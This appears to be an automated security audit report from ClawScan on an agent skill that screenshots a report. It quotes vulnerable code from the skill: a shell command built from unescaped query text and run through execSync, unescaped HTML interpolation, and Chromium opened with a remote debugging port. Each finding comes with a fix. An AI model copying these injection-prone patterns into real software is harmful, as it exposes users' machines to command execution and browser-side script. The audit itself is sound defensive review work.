Business Opportunity Screenshot
WarnAudited by ClawScan on May 18, 2026.
Overview
This skill matches its stated screenshot-report purpose, but it builds local shell commands from unescaped input, which could let unsafe text run commands on the user’s machine.
Install only if you trust the script and can run it in a controlled workspace. Avoid passing arbitrary or user-supplied query text until the shell-command construction is fixed, and consider reviewing or patching the HTML escaping and Chromium debugging setup before use.
Findings (4)
Artifact-based informational review of SKILL.md, metadata, install specs, static scan signals, and capability signals. ClawScan does not execute the skill or run runtime probes.
If the agent or user supplies a query containing shell metacharacters, unintended local commands could run with the user’s permissions.
The documented query input is inserted directly into a shell command that is executed with execSync, without quoting, validation, or an argument array.
function exec(command, options = {}) { ... return execSync(command, { ... }).trim(); } ... const result = exec(`clawhub search ${query}`);Replace execSync string commands with execFile/spawn argument arrays, strictly validate query and slug values, and avoid passing untrusted text through the shell.
Malformed or malicious report data could alter the generated page or run browser-side script when the report is opened for screenshotting.
User-controlled output_name and ClawHub-derived skill fields are interpolated into generated HTML that the skill then opens in Chromium, with no visible HTML escaping in the provided code.
<title>${outputName}</title> ... <span class="skill-name">${s.slug}</span> ... <p class="skill-desc">${s.summary}</p>HTML-escape all user and provider-supplied values before writing the report, or generate the report using safe text nodes/templates that do not execute embedded markup.
Users may not realize they must install and trust additional local software before the skill works.
The skill depends on external local tools and an npm package, but the registry requirements list no required binaries or install spec.
## 依赖 - `clawhub` CLI - `chromium-browser` - `puppeteer-core` npm 包 - WSL2 环境 + DISPLAY=:0 ## 安装依赖 ```bash npm install puppeteer-core ```
Declare required binaries and npm setup in metadata/install specs, and install from a reviewed lockfile or pinned package version.
While purpose-aligned, an open browser debugging port can expose browser control to local processes while it is running.
The skill intentionally opens Chromium with a local debugging port so Puppeteer can capture a screenshot.
chromium-browser --remote-debugging-port=9222 <url> ... puppeteer.connect({ browserURL: 'http://localhost:9222' })Use a temporary isolated browser profile, bind debugging to localhost only, close Chromium after the screenshot, and avoid running it alongside sensitive browser sessions.